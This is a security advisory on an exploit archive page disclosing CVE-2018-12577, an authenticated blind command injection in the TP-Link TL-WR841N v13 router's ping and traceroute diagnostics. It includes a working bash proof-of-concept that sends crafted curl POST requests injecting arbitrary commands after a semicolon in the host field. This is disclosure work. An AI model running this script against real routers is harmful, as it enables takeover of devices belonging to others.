what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TP-Link TL-WR841N V13 Command Injection

TP-Link TL-WR841N V13 Command Injection
Posted Jun 28, 2018
Authored by Tim Coen

TP-Link TL-WR841N v13 suffers from a blind command injection vulnerability.

tags | exploit
advisories | CVE-2018-12577
SHA-256 | 92b9e15c1917bfa85cd7b7d7dec306620e04cc32a685a4d63fedfeb461b5460b

TP-Link TL-WR841N V13 Command Injection

Change Mirror Download
  * Vulnerability: Authenticated Blind Command Injection
* Affected Software: TP-Link TL-WR841N v13
* Affected Version: 0.9.1 4.16 v0001.0 Build 180119 Rel.65243n
* Patched Version: None
* Risk: High
* Vendor Contacted: 05/20/2018
* Vendor Fix: None
* Public Disclosure: 06/27/2018

##### Overview

The ping and traceroute functionalities allow for OS command injection.
An authenticated attacker can use this to execute arbitrary commands on
the router by sending specifically crafter HTTP requests to it.

##### CVSS

High 8.7 CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

##### Details

The ping and traceroute functionalities accept user input and insert it
into a command without sanitation. An attacker can for example insert
further commands via a semicolon.

It should be noted that a user can already gain code execution by
uploading a custom firmware version. However, because of this
vulnerability, an attack could be performed by a remote attacker via a
CSRF issue in the same firmware version. Up until the previous firmware
version the attack could also be performed by an unauthenticated
attacker from the internal network because of a broken authentication issue.

##### POC

A successful attack requires the issuing of two POST requests. An attack
can for example be performed by intercepting the POST request to "/cgi"
and changing "host=127.0.0.1" to "host=127.0.0.1; reboot;"

The following script can be used to automate the process:

if [ "$#" -ne 3 ]; then
echo "Usage: ./exec.sh 'user' 'pass' 'reboot'"
fi
USER=$1
PASS=$2
COMMAND=$3
AUTH=$(echo -ne "$USER:$PASS" | base64)

BINARY1=$'[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0d\x0adataBlockSize=64\x0d\x0atimeout=1\x0d\x0anumberOfRepetitions=4\x0d\x0ahost=127.0.0.1;'
BINARY2=$';\x0d\x0aX_TP_ConnName=ewan_ipoe_d\x0d\x0adiagnosticsState=Requested\x0d\x0a'
curl -i -s -k -X 'POST' 'http://192.168.0.1/cgi?2' -H 'Referer:
http://192.168.0.1/mainFrame.htm' -H "Cookie: Authorization=Basic $AUTH"
--data-binary "$BINARY1$COMMAND$BINARY2"

curl -i -s -k -X 'POST' 'http://192.168.0.1/cgi?7' -H 'Referer:
http://192.168.0.1/mainFrame.htm' -H "Cookie: Authorization=Basic $AUTH"
--data-binary $'[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'

##### Solution

The vendor did not fix the issue.

As an attack is only possible by an authenticated attacker or by
exploiting other vulnerabilities - such as CSRF issues or broken
authentication - users are advised to use secure passwords and to
mitigate against other vulnerabilities.

##### Timeline

- 05/20/2018 Requested email address via contact form (no response)
- 05/24/2018 Send advisory to security@tp-link.com asking for
confirmation, set disclosure date (no response)
- 06/01/2018 Asked for confirmation at support.usa@tp-link.com
- 06/04/2018 Vendor confirmed receipt of advisory
- 06/12/2018 Requested Status Update
- 06/14/2018 Vendor claims they never received advisory
- 06/14/2018 Resend advisory asking for confirmation (no response)
- 06/18/2018 Reminded vendor of disclosure date (no response)
- 06/18/2018 Requested CVE
- 06/19/2018 CVE assigned
- 06/27/2018 Disclosure

--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0xFD8E2B9091A24C75
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close